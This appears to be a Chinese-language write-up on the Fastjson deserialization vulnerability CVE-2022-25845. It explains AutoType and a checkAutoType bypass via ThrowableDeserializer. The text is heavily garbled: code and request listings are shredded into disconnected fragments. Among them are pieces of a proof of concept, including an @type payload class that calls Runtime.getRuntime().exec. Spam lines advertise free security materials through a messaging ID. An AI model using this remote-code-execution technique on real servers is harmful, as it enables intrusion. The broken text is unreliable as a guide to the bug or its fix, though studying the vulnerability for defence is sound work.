但是#xff0c;Fastjson在序列化及反序列化的过…01漏洞编号

CVE-2022-25845CNVD-2022-40233CNNVD-202206-1037二、Fastjson知多少

万恶之源AutoType

Bean序列化为JSON字符串这样得到的字符串就可以通过数据库等方式进行持久化了。

但是Fastjson在序列化及反序列化的过程中没有使用Java自带的序列化机制而是自定义了一套机制。

对于JSON框架来说想要把一个Java对象转换成字符串有两种选择

1、基于属性

在我们常用的JSON序列化框架中Fastjson和Jackson将对象序列化成Json字符串时是通过遍历该类中所有的Getter方法来进行的。

而Gson不是这么做的它是通过反射遍历该类中的所有属性并把其值序列化为Json

假设我们有下面这个Java类

//所有网络安全全套资料免费领取加w:anquan455领取~当我们对它进行序列化时Fastjson会扫描其中的Getter方法即找到getName和getFruit这时就会将Name和Fruit两个字段的值序列化到JSON字符串中。

那么问题来了上面定义的Fruit只是一个接口序列化的时候Fastjson能将属性值正确序列化出来吗如果可以的话反序列的时候Fastjson会把这个Fruit反序列化成什么类型呢

我们尝试基于Fastjson

System.out.println(toJSONString

jsonString);以上代码比较简单我们创建了一个store为它指定了名称并创建了Fruit的子类型Apple然后将store用JSON.toJSONString进行序列化可以得到以下JSON内容

toJSONString

}那么Fruit的类型是什么呢能否反序列化为Apple呢我们再来执行以下代码

Store

com.hollis.lab.fastjson.test.$Proxy0

cannot

com.hollis.lab.fastjson.test.Apple

com.hollis.lab.fastjson.test.FastJsonTest.main(FastJsonTest.java:26)可以看到在将store反序列化后我们尝试将Fruit转换成Apple但抛出了异常如果直接转换成Fruit则不会报错如下

Fruit

newFruit);从以上现象中我们得知当一个类中包含了一个接口或抽象类的时候使用Fastjson进行序列化会将子类型抹去只保留接口抽象类的类型使得反序列化时无法拿到原始类型。

如何解决这个问题呢Fastjson引入了AutoType在序列化时把原始类型记录下来。

使用方法是通过SerializerFeature.WriteClassName进行标记即将上述代码中的

String

JSON.toJSONString(store,SerializerFeature.WriteClassName);修改后的代码输出结果如下

System.out.println(toJSONString

jsonString);

type:com.hollis.lab.fastjson.test.Store,

fruit:{

type:com.hollis.lab.fastjson.test.Apple,

price:0.5

}可以看到使用SerializerFeature.WriteClassName进行标记后JSON符串中多出了一个type字段标注了类对应的原始类型方便在反序列化的时候定位到具体类型。

**

如上将序列化后的字符串再反序列化就可以顺利拿到Apple类型整体输出内容如下

toJSONString

type:com.hollis.lab.fastjson.test.Store,fruit:{

type:com.hollis.lab.fastjson.test.Apple,price:0.5

,name:Hollis

Apple{price0.5}这就是Fastjson中引入AutoType的原因但是也正因为这个特性因为功能设计之初在安全方面考虑不周给后续的Fastjson使用者带来了无尽的痛苦。

checkAutoType

1、Fastjson是基于内置黑名单来实现安全的打开AutoType后可能造成安全风险即绕过黑名单。

2、关闭AutoType后是基于白名单进行防护的此次解析的漏洞就是在未开启AutoType时产生的。

从v1.2.25版本开始Fastjson默认关闭了AutoType支持并且加入了checkAutoType加入了黑白名单来防御AutoType开启的情况。

Fastjson绕过历史可以分为AutoType机制绕过和黑名单绕过绝大部分情况都是寻找一个新的利用链来绕过黑名单所以Fastjson官方的黑名单列表越来越大但是更有意义的绕过显然是AutoType机制绕过这样无需手动配置autoTypeSupport也可能进行利用。

我们先来看一下通过checkAutoType()校验的方式有哪些

6、使用ParserConfig.AutoTypeCheckHandler接口通过校验的类

三、攻击思路

**方法**寻找使用checkAutoType()的函数并使之通过checkAutoType()校验

通过研究v1.2.50和v1.2.68的绕过方式主要是在ObjectDeserializer接口的子类JavaBeanDeserializer中存在expectClass非空的checkAutoType调用这也是绕过的关键。

顺着这个思路我们继续在ObjectDeserializer接口的其他子类中寻找expectClass非空的checkAutoType调用发现在子类ThrowableDeserializer的函数deserialze中也存在满足条件的调用。

public

TypeUtils.fnv1a_64(expectClass.getName());

(expectHash

className.charAt(className.length()

1))

Arrays.binarySearch(INTERNAL_WHITELIST_HASHCODES,

fullHash)

(Arrays.binarySearch(internalDenyHashCodes,

hash)

(Arrays.binarySearch(acceptHashCodes,

hash)

(Arrays.binarySearch(denyHashCodes,

hash)

TypeUtils.getClassFromMapping(typeName)

null)

(Arrays.binarySearch(acceptHashCodes,

fullHash)

TypeUtils.getClassFromMapping(typeName);

(clazz

deserializers.findClass(typeName);

(clazz

java.util.LinkedHashMap.class!expectClass.isAssignableFrom(clazz))

throw

(Arrays.binarySearch(denyHashCodes,

hash)

(Arrays.binarySearch(acceptHashCodes,

hash)

expectClass.isAssignableFrom(clazz))

throw

defaultClassLoader.getResourceAsStream(resource);

else

ParserConfig.class.getClassLoader().getResourceAsStream(resource);

(is

(ClassLoader.class.isAssignableFrom(clazz)

classloader

javax.sql.DataSource.class.isAssignableFrom(clazz)

dataSource

javax.sql.RowSet.class.isAssignableFrom(clazz)

throw

(expectClass.isAssignableFrom(clazz))

clazz);

text/html,application/xhtmlxml,application/xml;

/*;q0.8

zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2

Accept-Encoding:

com.example.springfastjson.model.poc20220523,

name:

com.example.springfastjson.model;

import

Runtime.getRuntime().exec(str);

catch

java.lang.Exception步入到checkAutoType

尝试从缓存mapping中实例化clazzTypeUtils.addBaseClassMappings已经将java.lang.Exception加入了mapping

往下走getDeserializer返回的ObjectDeserializer为ThrowableDeserializer类型。

进入ThrowableDeserializer.deserialze顺利到达checkAutoType

参数传到checkAutoType函数且expectClass不为空顺利绕过checkAutoType函数。

【一一帮助安全学习,点我一一】